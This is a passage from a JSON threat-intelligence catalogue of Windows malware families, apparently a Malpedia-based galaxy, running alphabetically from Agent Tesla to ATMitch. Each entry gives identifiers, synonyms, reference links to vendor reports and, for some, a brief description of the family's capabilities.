"https://blog.malwarebytes.com/cybercrime/2020/04/new-agenttesla-variant-steals-wifi-credentials/", "https://lab52.io/blog/a-twisted-malware-infection-chain/", "https://malwatch.github.io/posts/agent-tesla-malware-analysis/", "https://isc.sans.edu/forums/diary/AgentTesla+Delivered+via+a+Malicious+PowerPoint+AddIn/26162/", "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", "https://malwr-analysis.com/2020/04/05/trojan-agent-tesla-malware-analysis/", "https://news.sophos.com/en-us/2020/05/14/raticate/", "https://isc.sans.edu/diary/rss/27092", "https://cofense.com/strategic-analysis-agent-tesla-expands-targeting-and-networking-capabilities/", "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analyzing-various-layers-agentteslas-packing/", "https://www.denexus.io/wp-content/uploads/2021/02/Threat-actor-targeting-gas-oil-supply-chains_public.pdf", "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://blog.malwarelab.pl/posts/basfu_aggah/", "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", "https://mrt4ntr4.github.io/How-Analysing-an-AgentTesla-Could-Lead-To-Attackers-Inbox-1/", "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/negasteal-uses-hastebin-for-fileless-delivery-of-crysis-ransomware", "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/" ], "synonyms": [ "AgenTesla", "AgentTesla", "Negasteal" ], "type": [] }, "uuid": "b88e29cf-79d9-42bc-b369-0383b5e04380", "value": "Agent Tesla" }, { "description": "The agfSpy backdoor retrieves configuration and commands from its C&C server. These commands allow the backdoor to execute shell commands and send the execution results back to the server. It also enumerates directories and can list, upload, download, and execute files, among other functions. The capabilities of agfSpy are very similar to dneSpy, except each backdoor uses a different C&C server and various formats in message exchanges.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.agfspy", "https://www.trendmicro.com/en_us/research/20/j/operation-earth-kitsune-a-dance-of-two-new-backdoors.html" ], "synonyms": [], "type": [] }, "uuid": "405fe149-1454-4e8c-a4a3-d56e0c5f62d7", "value": "AgfSpy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.albaniiutas", "https://insight-jp.nttsecurity.com/post/102gkfp/pandas-new-arsenal-part-2-albaniiutas", "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/" ], "synonyms": [ "BlueTraveller" ], "type": [] }, "uuid": "dff7e10c-41ca-481d-8003-73169803272d", "value": "Albaniiutas" }, { "description": "According to Trend Micro Encyclopia:\r\nALDIBOT first appeared in late August 2012 in relevant forums. Variants can steal passwords from the browser Mozilla Firefox, instant messenger client Pidgin, and the download manager jDownloader. ALDIBOT variants send the gathered information to their command-and-control (C&C) servers.\r\n\r\nThis malware family can also launch Distributed Denial of Service (DDoS) attacks using different protocols such as HTTP, TCP, UDP, and SYN. It can also perform flood attacks via Slowloris and Layer 7.\r\n\r\nThis bot can also be set up as a SOCKS proxy to abuse the infected machine as a proxy for any protocols.\r\n\r\nThis malware family can download and execute arbitrary files, and update itself. Variants can steal information, gathering the infected machine’s hardware identification (HWID), host name, local IP address, and OS version.\r\n\r\nThis backdoor executes commands from a remote malicious user, effectively compromising the affected system.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aldibot", "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/aldibot" ], "synonyms": [], "type": [] }, "uuid": "43ec8adc-0658-4765-be20-f22679097fab", "value": "Aldibot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alfonso_stealer", "https://twitter.com/3xp0rtblog/status/1344352253294104576" ], "synonyms": [], "type": [] }, "uuid": "a76874b3-12d0-4dec-9813-01819e6b6d49", "value": "Alfonso Stealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alice_atm", "http://blog.trendmicro.com/trendlabs-security-intelligence/alice-lightweight-compact-no-nonsense-atm-malware/", "https://www.symantec.com/security-center/writeup/2016-122104-0203-99", "https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf", "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html" ], "synonyms": [ "AliceATM", "PrAlice" ], "type": [] }, "uuid": "41bfc8ad-ce2c-4ede-aa54-b3240a5cc8ca", "value": "Project Alice" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alina_pos", "https://blog.centurylink.com/alina-point-of-sale-malware-still-lurking-in-dns/", "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/", "http://www.xylibox.com/2013/02/alina-34-pos-malware.html", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina-POS-malware--sparks--off-a-new-variant/", "https://blog.trendmicro.com/trendlabs-security-intelligence/two-new-pos-malware-affecting-us-smbs/", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Casting-a-Shadow-on-POS/", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Following-The-Shadow-Part-1/", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Following-The-Shadow-Part-2/" ], "synonyms": [ "alina_eagle", "alina_spark", "katrina" ], "type": [] }, "uuid": "27d90cd6-095a-4c28-a6f2-d1b47eae4f70", "value": "Alina POS" }, { "description": "AllaKore is a simple Remote Access Tool written in Delphi, first observed in 2015 but still in early stages of development. It implements the RFB protocol which uses frame buffers and thus is able to send back only the changes of screen frames to the controller, speeding up the transport and visualization control.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.allakore", "https://www.seqrite.com/documents/en/white-papers/Seqrite-WhitePaper-Operation-SideCopy.pdf", "https://twitter.com/_re_fox/status/1212070711206064131", "https://github.com/Anderson-D/AllaKore" ], "synonyms": [], "type": [] }, "uuid": "fb1c6035-42ee-403c-a2ae-a53f7ab2de00", "value": "AllaKore" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.allaple", "https://trapx.com/wp-content/uploads/2017/08/White_Paper_TrapX_AllapleWorm.pdf", "https://researchcenter.paloaltonetworks.com/2014/08/hunting-mutex/" ], "synonyms": [ "Starman" ], "type": [] }, "uuid": "6aabb492-e282-40fb-a840-fe4e643ec094", "value": "Allaple" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.almanahe", "https://www.elastic.co/de/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" ], "synonyms": [], "type": [] }, "uuid": "352f79b1-6862-4164-afa3-a1d787c40ec1", "value": "Almanahe" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alma_communicator", "https://researchcenter.paloaltonetworks.com/2017/11/unit42-oilrig-deploys-alma-communicator-dns-tunneling-trojan/", "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/" ], "synonyms": [], "type": [] }, "uuid": "a0881a0c-e677-495b-b475-290af09bb716", "value": "Alma Communicator" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alma_locker" ], "synonyms": [], "type": [] }, "uuid": "b5138914-6c2b-4c8e-b182-d94973fe5a6b", "value": "AlmaLocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alpc_lpe", "https://www.welivesecurity.com/2018/09/05/powerpool-malware-exploits-zero-day-vulnerability/" ], "synonyms": [], "type": [] }, "uuid": "86517f1a-6e67-47ba-95dd-84b3125ad983", "value": "ALPC Local PrivEsc" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphabet_ransomware", "https://twitter.com/JaromirHorejsi/status/813714602466877440" ], "synonyms": [], "type": [] }, "uuid": "5060756f-8385-465d-a7dd-7bf09a54da92", "value": "Alphabet Ransomware" }, { "description": "A new form of ransomware named AlphaLocker that is built by cybercriminals for cybercriminals. Like all incarnations of Ransomware As A Service (RaaS), the AlphaLocker malware program can be purchased and launched by pretty much anyone who wants to get into the ransomware business. What makes AlphaLocker different from other forms of RaaS is its relatively cheap cost. The ransomware can be purchased for just $65 in bitcoin.\r\n\r\nAlphaLocker, also known as Alpha Ransomware, is based on the EDA2 ransomware, an educational project open-sourced on GitHub last year by Turkish researcher Utku Sen. A Russian coder seems to have cloned this repository before it was taken down and used it to create his ransomware, a near-perfect clone of EDA2. The ransomware's author, is said to be paying a great deal of attention to updating the ransomware with new features, so it would always stay ahead of antivirus engines, and evade detection.\r\n\r\nAlphaLocker's encryption process starts when the ransomware contacts its C&C server. The server generates a public and a private key via the RSA-2048 algorithm, sending the public key to the user's computer and saving the private key to its server. On the infected computer, the ransomware generates an AES-256 key for each file it encrypts, and then encrypts this key with the public RSA key, and sent to the C&C server.\r\n\r\nTo decrypt their files, users have to get ahold of the private RSA key which can decrypt the AES-encrypted files found on their computers. Users have to pay around 0.35 Bitcoin (~$450) to get this key, packaged within a nice decrypter.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphalocker", "https://blog.cylance.com/an-introduction-to-alphalocker" ], "synonyms": [], "type": [] }, "uuid": "c1b9e8c5-9283-4dbe-af10-45956a446fb7", "value": "AlphaLocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphanc", "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", "https://www.secureworks.com/research/threat-profiles/nickel-gladstone" ], "synonyms": [], "type": [] }, "uuid": "6e94186c-987e-43da-be2d-9b44f254c8b9", "value": "AlphaNC" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alreay", "https://securelist.com/blog/sas/77908/lazarus-under-the-hood/" ], "synonyms": [], "type": [] }, "uuid": "d258de39-e351-47e3-b619-731c87f13d9c", "value": "Alreay" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alureon", "http://contagiodump.blogspot.com/2012/02/purple-haze-bootkit.html", "http://contagiodump.blogspot.com/2010/02/list-of-aurora-hydraq-roarur-files.html", "http://contagiodump.blogspot.com/2011/02/tdss-tdl-4-alureon-32-bit-and-64-bit.html", "https://www.johannesbader.ch/2016/01/the-dga-in-alureon-dnschanger/", "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj64_wowlik.vt", "https://www.virusbulletin.com/virusbulletin/2016/01/paper-notes-click-fraud-american-story/" ], "synonyms": [ "Olmarik", "Pihar", "TDL", "TDSS", "wowlik" ], "type": [] }, "uuid": "ad4e6779-59a6-4ad6-98de-6bd871ddb271", "value": "Alureon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey", "https://twitter.com/ViriBack/status/1062405363457118210", "https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-decrypt-strings-in-amadey-1-09/", "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware", "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do", "https://krabsonsecurity.com/2019/02/13/analyzing-amadey-a-simple-native-malware/", "https://nao-sec.org/2019/04/Analyzing-amadey.html", "https://www.anquanke.com/post/id/230116", "https://twitter.com/0xffff0800/status/1062948406266642432", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672" ], "synonyms": [], "type": [] }, "uuid": "77f2c81f-be07-475a-8d77-f59b4847f696", "value": "Amadey" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.amtsol", "https://blogs.technet.microsoft.com/mmpc/2017/06/07/platinum-continues-to-evolve-find-ways-to-maintain-invisibility/", "http://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf" ], "synonyms": [ "Adupihan" ], "type": [] }, "uuid": "ce25929c-0358-477c-a85e-f0bdfcc99a54", "value": "AMTsol" }, { "description": "Anatova is a ransomware family with the goal of ciphering all the files that it can and then requesting payment from the victim. It will also check if network shares are connected and will encrypt the files on these shares too. The code is also prepared to support modular extensions.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.anatova_ransom", "https://www.bleepingcomputer.com/news/security/new-anatova-ransomware-supports-modules-for-extra-functionality/", "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/happy-new-year-2019-anatova-is-here/" ], "synonyms": [], "type": [] }, "uuid": "2a28ad28-8ba5-4b8b-9652-bc0cdd37b2c4", "value": "Anatova Ransomware" }, { "description": "Anchor is a sophisticated backdoor served as a module to a subset of TrickBot installations. Operating since August 2018 it is not delivered to everybody, but contrary is delivered only to high-profile targets. Since its C2 communication scheme is very similar to the one implemented in the early TrickBot, multiple experts believe it could be attributed to the same authors.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.anchor", "https://www.netscout.com/blog/asert/dropping-anchor", "https://technical.nttsecurity.com/post/102fsp2/trickbot-variant-anchor-dns-communicating-over-dns", "https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf", "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/", "https://unit42.paloaltonetworks.com/ryuk-ransomware/", "https://hello.global.ntt/zh-cn/insights/blog/trickbot-variant-communicating-over-dns", "https://labs.sentinelone.com/the-deadly-planeswalker-how-the-trickbot-group-united-high-tech-crimeware-apt/", "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-hidden-anchor-bot-nexus-operations/", "https://medium.com/walmartglobaltech/anchor-and-lazarus-together-again-24744e516607", "https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/", "https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth" ], "synonyms": [], "type": [] }, "uuid": "c38308a1-c89d-4835-b057-744f66ff7ddc", "value": "Anchor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.andromeda", "https://www.europol.europa.eu/newsroom/news/andromeda-botnet-dismantled-in-international-cyber-operation", "https://blog.avast.com/andromeda-under-the-microscope", "http://blog.morphisec.com/andromeda-tactics-analyzed", "https://eternal-todo.com/blog/yet-another-andromeda-gamarue-analysis", "http://resources.infosecinstitute.com/andromeda-bot-analysis/", "http://www.0xebfe.net/blog/2013/03/30/fooled-by-andromeda/", "https://www.virusbulletin.com/virusbulletin/2013/08/andromeda-2-7-features", "https://blogs.technet.microsoft.com/mmpc/2017/12/04/microsoft-teams-up-with-law-enforcement-and-other-partners-to-disrupt-gamarue-andromeda/", "https://www.virusbulletin.com/virusbulletin/2018/02/review-evolution-andromeda-over-years-we-say-goodbye/", "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf", "https://www.crowdstrike.com/blog/how-to-remediate-hidden-malware-real-time-response/", "https://eternal-todo.com/blog/andromeda-gamarue-loves-json", "http://resources.infosecinstitute.com/andromeda-bot-analysis-part-two/", "https://byte-atlas.blogspot.ch/2015/04/kf-andromeda-bruteforcing.html" ], "synonyms": [ "B106-Gamarue", "B67-SS-Gamarue", "Gamarue", "b66" ], "type": [] }, "uuid": "07f46d21-a5d4-4359-8873-18e30950df1a", "value": "Andromeda" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.andromut", "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part3/", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://documents.trendmicro.com/assets/Tech-Brief-Latest-Spam-Campaigns-from-TA505-Now-Using-New-Malware-Tools-Gelup-and-FlowerPippi.pdf", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", "https://www.proofpoint.com/us/threat-insight/post/ta505-begins-summer-campaigns-new-pet-malware-downloader-andromut-uae-south" ], "synonyms": [ "Gelup" ], "type": [] }, "uuid": "85673cd4-fb05-4f6d-94ec-71290ae2e422", "value": "AndroMut" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.anel", "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf", "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", "https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-adds-updated-tools-to-its-arsenal/", "https://www.secureworks.com/research/threat-profiles/bronze-riverside", "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-Haruyama.pdf" ], "synonyms": [ "UPPERCUT", "lena" ], "type": [] }, "uuid": "a180afcc-d42d-4600-b70f-af27aaf851b7", "value": "Anel" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.antefrigus", "https://github.com/albertzsigovits/malware-notes/blob/master/Antefrigus.md", "http://id-ransomware.blogspot.com/2019/11/antefrigus-ransomware.html" ], "synonyms": [], "type": [] }, "uuid": "04788457-5b72-4a66-8f2c-73497919ece2", "value": "AnteFrigus Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.antilam" ], "synonyms": [ "Latinus" ], "type": [] }, "uuid": "02be7f3a-f3bf-447b-b8b4-c78432b82694", "value": "Antilam" }, { "description": "According to Microsoft Security Intelligence, Anubis is an information stealer sold on underground forums since June 2020. The name overlaps with the Android banking malware but is unrelated. It contains code forked from Loki PWS.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.anubis", "https://twitter.com/MsftSecIntel/status/1298752223321546754" ], "synonyms": [ "Anubis Stealer" ], "type": [] }, "uuid": "b19c9f63-a18d-47bb-a9fe-1f9cea21bac0", "value": "Anubis (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.apocalipto", "https://www.visakorea.com/dam/VCOM/download/merchants/Grocery_Malware_04242013.pdf" ], "synonyms": [], "type": [] }, "uuid": "d3e16d46-e436-4757-b962-6fd393056415", "value": "Apocalipto" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.apocalypse_ransom", "http://blog.emsisoft.com/2016/06/29/apocalypse-ransomware-which-targets-companies-through-insecure-rdp/" ], "synonyms": [], "type": [] }, "uuid": "e87d9df4-b464-4458-ae1f-31cea40d5f96", "value": "Apocalypse" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.applejeus", "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048c", "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048b", "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048a", "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048g", "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048f", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048d", "https://www.vkremez.com/2019/10/lets-learn-dissecting-lazarus-windows.html", "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048e", "https://us-cert.cisa.gov/ncas/alerts/aa21-048a", "https://twitter.com/VK_Intel/status/1182730637016481793" ], "synonyms": [], "type": [] }, "uuid": "2b655949-8a17-46e5-9522-519c6d77c45f", "value": "AppleJeus (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.appleseed", "https://www.boho.or.kr/filedownload.do?attach_file_seq=2651&attach_file_id=EpF2651.pdf", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://www.boho.or.kr/filedownload.do?attach_file_seq=2651&attach_file_id=EpF2652.pdf" ], "synonyms": [], "type": [] }, "uuid": "c7f8e3b8-328d-43c3-9235-9a2f704389b4", "value": "Appleseed" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ardamax", "https://medium.com/@MalFuzzer/dissecting-ardamax-keylogger-f33f922d2576", "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf" ], "synonyms": [], "type": [] }, "uuid": "4f5c2f8b-06ef-4fb3-b03c-afdcafa88de5", "value": "ArdaMax" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.arefty", "http://www.welivesecurity.com/2016/03/23/new-self-protecting-usb-trojan-able-to-avoid-detection/" ], "synonyms": [], "type": [] }, "uuid": "bf135b0a-3120-42c4-ba58-c80f9ef689bf", "value": "Arefty" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ariabody", "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/", "https://securelist.com/naikons-aria/96899/" ], "synonyms": [], "type": [] }, "uuid": "5fa1c068-8e73-4930-b6fe-8c92c6357df6", "value": "Aria-body" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.arik_keylogger", "http://remote-keylogger.net/" ], "synonyms": [ "Aaron Keylogger" ], "type": [] }, "uuid": "3572d725-bf13-43ef-9511-bdbb7692ab06", "value": "Arik Keylogger" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.arkei_stealer", "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", "https://www.bleepingcomputer.com/news/security/hacker-breaches-syscoin-github-account-and-poisons-official-client/" ], "synonyms": [ "ArkeiStealer" ], "type": [] }, "uuid": "59eff508-7f26-4fd8-b526-5772a9f3d9a6", "value": "Arkei Stealer" }, { "description": "ARS Loader, also known as ARS VBS Loader, is written in Visual Basic Script and its main purpose is to control an infected machine via different available commands, acting as a remote access trojan (RAT). Its code is based on ASPC, another Visual Basic Script malware, which at the same time seems to be based on SafeLoader.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ars_loader", "https://www.flashpoint-intel.com/blog/meet-ars-vbs-loader/", "https://twitter.com/Racco42/status/1001374490339790849", "https://www.blueliv.com/blog-news/research/ars-loader-evolution-zeroevil-ta545-airnaine/" ], "synonyms": [], "type": [] }, "uuid": "1a4f99cc-c078-41f8-9749-e1dc524fc795", "value": "ARS VBS Loader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.artfulpie", "https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/", "https://www.us-cert.gov/ncas/analysis-reports/ar20-045e" ], "synonyms": [], "type": [] }, "uuid": "bc0ad216-9b56-489e-858d-68522e1fdfaf", "value": "ARTFULPIE" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.artra", "https://www.bitdefender.com/files/News/CaseStudies/study/352/Bitdefender-PR-Whitepaper-BitterAPT-creat4571-en-EN-GenericUse.pdf", "https://www.freebuf.com/articles/database/192726.html", "https://unit42.paloaltonetworks.com/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/", "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english" ], "synonyms": [], "type": [] }, "uuid": "05de9c50-5958-4d02-b1a0-c4a2367c2d22", "value": "Artra Downloader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ascentloader" ], "synonyms": [], "type": [] }, "uuid": "4e3fa4e6-bc7d-4024-b191-ccafa5347c13", "value": "AscentLoader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aspc" ], "synonyms": [], "type": [] }, "uuid": "bc128d41-33e6-40ec-aaf2-9a05da9a0a27", "value": "ASPC" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.asprox", "https://researchcenter.paloaltonetworks.com/2015/08/whats-next-in-malware-after-kuluoz/", "https://www.virusbulletin.com/virusbulletin/2012/11/tracking-2012-sasfis-campaign", "http://oalabs.openanalysis.net/2014/12/04/inside-the-new-asprox-kuluoz-october-2013-january-2014/" ], "synonyms": [ "Aseljo", "BadSrc" ], "type": [] }, "uuid": "ba557993-f64e-4538-8f13-dafaa3c0db00", "value": "Asprox" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.asruex", "https://blog.trendmicro.com/trendlabs-security-intelligence/asruex-backdoor-variant-infects-word-documents-and-pdfs-through-old-ms-office-and-adobe-vulnerabilities/", "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html" ], "synonyms": [], "type": [] }, "uuid": "a51595aa-a399-4332-a14d-a378bae609e7", "value": "Asruex" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.astaroth", "https://labs.f-secure.com/blog/attack-detection-fundamentals-code-execution-and-persistence-lab-1/", "https://www.microsoft.com/security/blog/2019/07/08/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack/", "https://www.microsoft.com/security/blog/2020/03/23/latest-astaroth-living-off-the-land-attacks-are-even-more-invisible-but-not-less-observable/", "https://www.botconf.eu/wp-content/uploads/2019/12/B2019-Soucek-Hornak-DemystifyingBankingTrojansFromLatinAmerica.pdf", "https://blog.talosintelligence.com/2020/05/astaroth-analysis.html", "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/", "https://blog.easysol.net/meet-lucifer-international-trojan/", "https://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/", "https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research", "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html" ], "synonyms": [ "Guildma" ], "type": [] }, "uuid": "0cdb83dd-106b-458e-8d04-ca864281e06e", "value": "Astaroth" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat", "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", "https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html", "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/", "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages", "https://securelist.com/apt-trends-report-q3-2020/99204/", "https://ti.qianxin.com/uploads/2020/09/17/69da886eecc7087e9dac2d3ea4c66ba8.pdf", "https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp/", "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/" ], "synonyms": [], "type": [] }, "uuid": "c94c4f23-20d1-4858-8f94-01a54b213981", "value": "AsyncRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.athenago" ], "synonyms": [], "type": [] }, "uuid": "587eff78-47be-4022-a1b5-7857340a9ab2", "value": "AthenaGo RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ati_agent", "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" ], "synonyms": [], "type": [] }, "uuid": "e248d80d-de8e-45de-b6d0-3740e5b34573", "value": "ATI-Agent" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmii", "https://securelist.com/atmii-a-small-but-effective-atm-robber/82707/" ], "synonyms": [], "type": [] }, "uuid": "f2a7c867-6380-4cbe-b524-50727a29f0c6", "value": "ATMii" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmitch", "https://securelist.com/blog/sas/77918/atmitch-remote-administration-of-atms/", 